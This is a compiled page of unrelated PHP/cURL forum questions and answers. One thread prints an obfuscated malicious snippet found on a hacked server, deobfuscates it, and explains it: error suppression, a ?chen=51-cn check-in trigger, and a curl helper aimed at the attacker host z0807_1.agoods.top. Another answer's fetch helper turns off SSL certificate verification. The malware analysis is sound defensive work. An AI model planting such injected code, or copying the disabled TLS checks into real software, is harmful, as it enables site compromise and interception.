Ok this is a really stupid one but something is definitely wrong.
I have a php script that needs to check for 2 variables ($token and $pid)
if(isset($token) && isset($pid)){
$ppurl = "https://api-3t.paypal.com/nvp";
$cURL = curl_init();
curl_setopt($cURL, CURLOPT_HEADER, false);
curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($cURL, CURLOPT_TIMEOUT, 5);
$GetExpressCheckoutDetails = $ppurl."?USER=".$apiuser."&PWD=".$apipwd."&SIGNATURE=".$apisig."&METHOD=GetExpressCheckoutDetails&VERSION=78&TOKEN=".$token;
curl_setopt($cURL, CURLOPT_URL, $GetExpressCheckoutDetails);
$info = parsePPResponse(curl_exec($cURL));
die (what);
}
Still, when I access the script directly without any variable it still runs that code.
The same way, if I add this before:
if(!isset($token)){ die(novar); }
It will still run the code and die with the message what .
This doesn't make any sense, anyone have a clue why this might be happenning ?
Based on your description, my best guess is that $pid was actually set and is just empty.
Before your if(isset($token) && isset($pid)){ run the following code:
print '<pre>';
print_r(get_defined_vars());
print '</pre>';
Then see if $pid or $token is present in the page output. If it is, you might need to change your condition to use the empty() function instead of isset().
!empty($token)
might work better
Try to add var_dump($token) to make sure that the variable is really not set and that you are really editing the same file you think you are editing (happened to me)
Related
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 1 year ago.
Improve this question
I have seen this code added to the server file. It looks like it is a malicious code, I can't seem a way to deobfuscate/decrypt this code.
<?php
#header('Content-Type:text/html;charset=utf-8');
error_reporting(0); $OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
global $O;
$O=urldecode($OOOOOO);
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
exit;
}else{
echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9};
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}
You can unravel this step by step.
There is this $OOOOOO string which then URL-decoded into $O, which yields the following (which looks like going through the keyboard row by row):
$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^$[]\\%{}!*|+,";
From then on, in many places characters of this string are accessed (using the lesser-known and by now also deprecated braces syntax for array index access) and used to build new strings. We can replace all these $O{x} bits with the actual characters (I used a regex replace):
if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode("<"."?"."p"."h"."p",$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo "["."o"."k"."!"."]";
exit;
}else{
echo "["."f"."a"."i"."l"."!"."]";
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO="h"."t"."t"."p".":"."/"."/".$oOooOO."."."a"."g"."o"."o"."d"."s"."."."t"."o"."p";
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}
We can then combine those strings to make them more readable:
if($_GET["chen"]=="51-cn"){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode("<?php",$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO="http://".$oOooOO.".agoods.top";
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}
Now let's rename the confusing variables:
if($_GET["chen"]=="51-cn"){
$varA = file_get_contents(__FILE__);
$varB = explode("<?php",$varA);
if(strpos($varB[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$varC='z0807_1';
$varD="http://".$varC.".agoods.top";
function someFunction($varE){
$varF=curl_init();
curl_setopt ($varF, CURLOPT_URL, $varE);curl_setopt ($varF, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($varF, CURLOPT_CONNECTTIMEOUT, 5);$varG = curl_exec($varF);
curl_close($varF);
return $varG;
}
Next, let's split up the long line inside of the function:
if($_GET["chen"]=="51-cn"){
$varA = file_get_contents(__FILE__);
$varB = explode("<?php",$varA);
if(strpos($varB[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$varC='z0807_1';
$varD="http://".$varC.".agoods.top";
function someFunction($varE){
$varF=curl_init();
curl_setopt ($varF, CURLOPT_URL, $varE);
curl_setopt ($varF, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($varF, CURLOPT_CONNECTTIMEOUT, 5);
$varG = curl_exec($varF);
curl_close($varF);
return $varG;
}
As a final step, we can guess better names for those variables:
if($_GET["chen"]=="51-cn"){
$thisFileSource = file_get_contents(__FILE__);
$parts = explode("<?php",$thisFileSource);
if(strpos($parts[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$subdomain='z0807_1';
$url="http://".$subdomain.".agoods.top";
function sendRequest($url){
$curl=curl_init();
curl_setopt ($curl, CURLOPT_URL, $url);
curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
$result = curl_exec($curl);
curl_close($curl);
return $result;
}
As for what this code does: If this is called with query parameter chen=51-cn in the URL, it checks if the current file contains the start of that $OOOOOO string in the first PHP code section, and if it does, it returns [ok!], otherwise [fail!]. (This sounds entirely useless to me, because if the code wouldn't exist, then it wouldn't run either, so just echo "[ok!]"; would have sufficed...) Additionally, it prepares a request to http://z0807_1.agoods.top but it's never executed, at least not in the piece of code that you showed. (Maybe it's executed elsewhere in your code at some other place where code got injected too! Could be worth looking for ooooooooOOOOOOOOoooooOOO.)
Googling for "agoods.top" reveals a lot of seemingly unrelated sites that include in their contents what appears to be various PHP errors like Warning: mysqli::__construct(): (HY000/1040): Too many connections in /www/wwwroot/z0930_1.agoods.top/connect2.php on line 7. (How ironic, given that in the injected code, error output is suppressed.) Browsing these sites (which I did with a lot of care, so you don't have to!) shows that some of them act maliciously, for example redirecting the user to a fake "browser update" page after a few seconds, and many are just down by now. This makes me believe that those are also hijacked sites, and that the code was supposed to eventually pull HTML from the attacker's sites on zXXXX_X.agoods.top and inject it into the page, but the attacker messed up and also delivered PHP errors that way which ended up in Google's cache.
Because i always wonder what to expect if this would happen to me
i looked up what this code does.
First the commented code, and below the comments only.
DO NOT execute this on your machine!
// Sets header ...
#header('Content-Type:text/html;charset=utf-8');
// Disables error reporting (sure to not trigger notifications on owner side).
error_reporting(0);
// Sets a char string: qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?\> <.-=:/1230654879';()&^$[]\\%{}!*|+,
// ^ escaped by me
$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
// Sets $O global (makes no sense to me).
global $O;
// decodes the url encoded string "qwertyuiopasdf...".
$O=urldecode($OOOOOO);
// $_GET['chen'] == '51-cn'
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
// Load this file into var.
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
// Explode by "<?php" (makes no sense to me).
$oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
// If "%71%77%65" is found in loaded file (part) (so if we loaded the "hacked" file)
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
// then echo "[ok!]" and exit
echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
exit;
}else{
// else echo "[fail!]" and exit
echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
exit;
}
}
// Following function got not called by provided code.
// I think its to load more code into the project.
// (I disabled the curl lines btw.)
// Set sub domain on var.
$oOooOO='z0807_1';
// Set url "http://z0807_1.agoods.top" on var.
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9};
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
// Init curl.
#$ooooOOOooOo=curl_init();
// Set url (given function param).
#curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);
// CURLOPT_RETURNTRANSFER = 1 to not echo out response.
#curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);
// 5 sec connection timeout.
#curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);
// Execute and set response to NEW var.
#$oooooOOOOooO = curl_exec($ooooOOOooOo);
#curl_close($ooooOOOooOo);
// Return new var content.
#return $oooooOOOOooO;
}
Here the "just comments" part.
// Sets header ...
// Disables error reporting (sure to not trigger notifications on owner side).
// Sets a char string: qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?\> <.-=:/1230654879';()&^$[]\\%{}!*|+,
// Sets $O global (makes no sense to me).
// decodes the url encoded string "qwertyuiopasdf...".
// $_GET['chen'] == '51-cn'
// Load this file into var.
// Explode by "<?php" (makes no sense to me).
// If "%71%77%65" is found in loaded file (part) (so if we loaded the "hacked" file)
// then echo "[ok!]" and exit
// else echo "[fail!]" and exit
// Following function got not called by provided code.
// I think its to load more code into the project.
// (I disabled the curl lines btw.)
// Set sub domain on var.
// Set url "http://z0807_1.agoods.top" on var.
// Init curl.
// Set url (given function param).
// CURLOPT_RETURNTRANSFER = 1 to not echo out response.
// 5 sec connection timeout.
// Execute and set response to NEW var.
// Return new var content.
So this looks to me like
not the complete code that got injected
done by a bot that checks if the injection was successfully
a script to load more bad code into your project on deamand.
Lets hope you just got "marked" somewhere as "found" - so nothing really happened yet.
But i dont know that.
I have a limit of 25 requests/min from PUBGs official API. For some reason instead of it requesting twice for each search its using up 4 requests. I can't figure out why. I have checked that the code isn't running twice. Only once, but still it's requesting 4 times.
UPDATE:
I tried making a separate page and apparently there is a bug somewhere calling my function twice. Still don't know why but I'm now 99% sure it's not the function itself.
Code For My Request
function getProfile($profileName, $region, $seasonDate){
// Just check if there is an acctual user
if($profileName === null){
$data->error = "Player Not Found";
$data->noUser = true;
return $data;
}else{
$season = "division.bro.official.".$seasonDate;
/*
Get The UserID
*/
$ch = curl_init("https://api.pubg.com/shards/$region/players?filter[playerNames]=$profileName");
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Authorization: Bearer APIKEY',
'Accept: application/vnd.api+json'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$rawData = json_decode(curl_exec($ch), true);
$data->playerId = $rawData["data"][0]["id"];
curl_close($ch);
// Testing if user exists
if($rawData["errors"][0]["title"] === "Not Found"){
$data->noUser = true;
$data->error = "Player Not Found";
return $data;
}else{
/*
Get The acctual stats
*/
$ch = curl_init("https://api.pubg.com/shards/$region/players/$data->playerId/seasons/$season");
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Authorization: Bearer APIKEY',
'Accept: application/vnd.api+json'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$data->playerDataJSON = curl_exec($ch);
$data->playerData = json_decode($data->playerDataJSON, true);
curl_close($ch);
return $data;
}
}
}
This is how it's getting called
if (isset($_POST['search-username'])) {
$username = $_POST['search-username'];
header("Location: /profile/$username/pc-na/2018-01/overall/tpp");
die();
}
In The actual profile php
$data = getProfile($page_parts[1], $page_parts[2], $page_parts[3]);
absolutely sure it's only called once? set a lock on it. change it to
function getProfile($profileName, $region, $seasonDate){
static $once=true;
if($once!==true){
throw new \LogicException("tried to run getProfile() twice!");
}
$once=false;
Shortly after I figure out it's not the function I realized that the culprit was an empty script I was calling. I knew this script created an error which I didn't really care about since it was empty and I had no idea why it was creating the error. For some obscure reason this script created the error. I'll just make a lesson out of it to always fix the smallest errors.
I've also been seeing this behavior - a script with a single curl_exec() request gets called twice.
The strange thing is this was only happening when running on localhost (under a wampp installation) but when run from any other webserver was fine and it is just called once.
I never managed to debug it completely but it seems to be an issue with the local server so test elsewhere if you are seeing this.
I've been trying to write a simple script in PHP to pull off data from a ISBN database site. and for some reason I've had nothing but issues using the file_get_contents command.. I've managed to get something working for this now, but would just like to see if anyone knows why this wasn't working?
The below would not populate the $page with any information so the preg matches below failed to get any information. If anyone knows what the hell was stopping this would be great?
$links = array ('
http://www.isbndb.com/book/2009_cfa_exam_level_2_schweser_practice_exams_volume_2','
http://www.isbndb.com/book/uniform_investment_adviser_law_exam_series_65','
http://www.isbndb.com/book/waterworks_a02','
http://www.isbndb.com/book/winning_the_toughest_customer_the_essential_guide_to_selling','
http://www.isbndb.com/book/yale_daily_news_guide_to_fellowships_and_grants'
); // array of URLs
foreach ($links as $link)
{
$page = file_get_contents($link);
#print $page;
preg_match("#<h1 itemprop='name'>(.*?)</h1>#is",$page,$title);
preg_match("#<a itemprop='publisher' href='http://isbndb.com/publisher/(.*?)'>(.*?)</a>#is",$page,$publisher);
preg_match("#<span>ISBN10: <span itemprop='isbn'>(.*?)</span>#is",$page,$isbn10);
preg_match("#<span>ISBN13: <span itemprop='isbn'>(.*?)</span>#is",$page,$isbn13);
echo '<tr>
<td>'.$title[1].'</td>
<td>'.$publisher[2].'</td>
<td>'.$isbn10[1].'</td>
<td>'.$isbn13[1].'</td>
</tr>';
#exit();
}
My guess is you have wrong (not direct) URLs. Proper ones should be without the www. part - if you fire any of them and inspect the returned headers, you'll see that you're redirected (HTTP 301) to another URL.
The best way to do it in my opinion is to use cURL among curl_setopt with options CURLOPT_FOLLOWLOCATION and CURLOPT_MAXREDIRS.
Of course you should trim your urls beforehands just to be sure it's not the problem.
Example here:
$curl = curl_init();
foreach ($links as $link) {
curl_setopt($curl, CURLOPT_URL, $link);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($curl, CURLOPT_MAXREDIRS, 5); // max 5 redirects
$result = curl_exec($curl);
if (! $result) {
continue; // if $result is empty or false - ignore and continue;
}
// do what you need to do here
}
curl_close($curl);
I'm trying to run a CURL script in wordpress but I'm having a problem.
When i test it, i get a 500 internal error as WP changes the URL.
So the script is at www.site.com/curl_script.php - When i test that (navigate to www.site.com/curl_script.php) I end up going to www.site.com/curl_script.php/wp-admin/install.php which returns a 500 internal error.
Now after playing around with the script, I've noticed the problem. It seems to be a function that I'm running (the curl function) thats causing wordpress to take me to that url.
Ive had similar issues to this but have managed to fix it by simply changing the names of the functions, but this doesn't seem to work anymore.
The function:
function verify_user($ref, $username, $uu_name){
$ch = curl_init($server_root);
curl_setopt($ch,CURLOPT_URL,"http://site.com/con1.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS,$fields_string);
curl_setopt($ch, CURLOPT_POST, 1);
$result = curl_exec($ch);
$data = json_decode($result);
global $ref_;
$ref_ = $data->ref_id;
//fetch some more info
$chh = curl_init($server_root);
curl_setopt($chh,CURLOPT_URL,"http://site.com/con2.php");
curl_setopt($chh, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($chh, CURLOPT_POST, 1);
$resultt_2 = curl_exec($chh);
$data_custt = json_decode($resultt_2);
$cust_st = $data__->user_status;
if ($cust_st == "FAILED"){
echo "this is bad";
}
elseif ($cust_st == "PASSED") {
echo "this is good";
}
}
}
Now when i call this function:
verify_user_info($ref, $username, $uu_name);
Wordpress plays up...
But when i leave the function out (don't call it), everything works fine.
It seems that WP is assuming the user is attempting to run the installation, when that's not the case.
Any ideas on how to fix this, dynamically as others will use this script too?
If sounds like you are getting redirected somehow, even though should shouldn't be if CURLOPT_FOLLOWLOCATION is not set. Try using the curl_getinfo function to debug the URL that is being accessed.
I want to get the dynamic contents from a particular url:
I have used the code
echo $content=file_get_contents('http://www.punoftheday.com/cgi-bin/arandompun.pl');
I am getting following results:
document.write('"Bakers have a great knead to make bread."
') document.write('© 1996-2007 Pun of the Day.com
')
How can i get the string Bakers have a great knead to make bread.
Only string inside first document.write will change, other code will remain constant
Regards,
Pankaj
You are fetching a JavaScript snippet that is supposed to be built in directly into the document, not queried by a script. The code inside is JavaScript.
You could pull out the code using a regular expression, but I would advise against it. First, it's probably not legal to do. Second, the format of the data they serve can change any time, breaking your script.
I think you should take at their RSS feed. You can parse that programmatically way easier than the JavaScript.
Check out this question on how to do that: Best way to parse RSS/Atom feeds with PHP
1) several local methods
<?php
echo readfile("http://example.com/"); //needs "Allow_url_include" enabled
echo include("http://example.com/"); //needs "Allow_url_include" enabled
echo file_get_contents("http://example.com/");
echo stream_get_contents(fopen('http://example.com/', "rb")); //you may use "r" instead of "rb" //needs "Allow_url_fopen" enabled
?>
2) Better Way is CURL:
echo get_remote_data('http://example.com'); // GET request
echo get_remote_data('http://example.com', "var2=something&var3=blabla" ); // POST request
//============= https://github.com/tazotodua/useful-php-scripts/ ===========
function get_remote_data($url, $post_paramtrs=false) { $c = curl_init();curl_setopt($c, CURLOPT_URL, $url);curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); if($post_paramtrs){curl_setopt($c, CURLOPT_POST,TRUE); curl_setopt($c, CURLOPT_POSTFIELDS, "var1=bla&".$post_paramtrs );} curl_setopt($c, CURLOPT_SSL_VERIFYHOST,false);curl_setopt($c, CURLOPT_SSL_VERIFYPEER,false);curl_setopt($c, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0"); curl_setopt($c, CURLOPT_COOKIE, 'CookieName1=Value;'); curl_setopt($c, CURLOPT_MAXREDIRS, 10); $follow_allowed= ( ini_get('open_basedir') || ini_get('safe_mode')) ? false:true; if ($follow_allowed){curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1);}curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 9);curl_setopt($c, CURLOPT_REFERER, $url);curl_setopt($c, CURLOPT_TIMEOUT, 60);curl_setopt($c, CURLOPT_AUTOREFERER, true); curl_setopt($c, CURLOPT_ENCODING, 'gzip,deflate');$data=curl_exec($c);$status=curl_getinfo($c);curl_close($c);preg_match('/(http(|s)):\/\/(.*?)\/(.*\/|)/si', $status['url'],$link);$data=preg_replace('/(src|href|action)=(\'|\")((?!(http|https|javascript:|\/\/|\/)).*?)(\'|\")/si','$1=$2'.$link[0].'$3$4$5', $data);$data=preg_replace('/(src|href|action)=(\'|\")((?!(http|https|javascript:|\/\/)).*?)(\'|\")/si','$1=$2'.$link[1].'://'.$link[3].'$3$4$5', $data);if($status['http_code']==200) {return $data;} elseif($status['http_code']==301 || $status['http_code']==302) { if (!$follow_allowed){if(empty($redirURL)){if(!empty($status['redirect_url'])){$redirURL=$status['redirect_url'];}} if(empty($redirURL)){preg_match('/(Location:|URI:)(.*?)(\r|\n)/si', $data, $m);if (!empty($m[2])){ $redirURL=$m[2]; } } if(empty($redirURL)){preg_match('/href\=\"(.*?)\"(.*?)here\<\/a\>/si',$data,$m); if (!empty($m[1])){ $redirURL=$m[1]; } } if(!empty($redirURL)){$t=debug_backtrace(); return call_user_func( $t[0]["function"], trim($redirURL), $post_paramtrs);}}} return "ERRORCODE22 with $url!!<br/>Last status codes<b/>:".json_encode($status)."<br/><br/>Last data got<br/>:$data";}
NOTICE: It automatically handles FOLLOWLOCATION problem + Remote urls are automatically re-corrected! ( src="./imageblabla.png" --------> src="http://example.com/path/imageblabla.png" )
p.s.on GNU/Linux distro servers, you might need to install the php5-curl package to use it.
Pekka's answer is probably the best way of doing this. But anyway here's the regex you might want to use in case you find yourself doing something like this, and can't rely on RSS feeds etc.
document\.write\(' // start tag
([^)]*) // the data to match
'\) // end tag
EDIT for example:
<?php
$subject = "document.write('"Paying for college is often a matter of in-tuition."<br />')\ndocument.write('<i>© 1996-2007 <a target=\"_blank\" href=\"http://www.punoftheday.com\">Pun of the Day.com</a></i><br />')";
$pattern = "/document\.write\('([^)]*)'\)/";
preg_match($pattern, $subject, $matches);
print_r($matches);
?>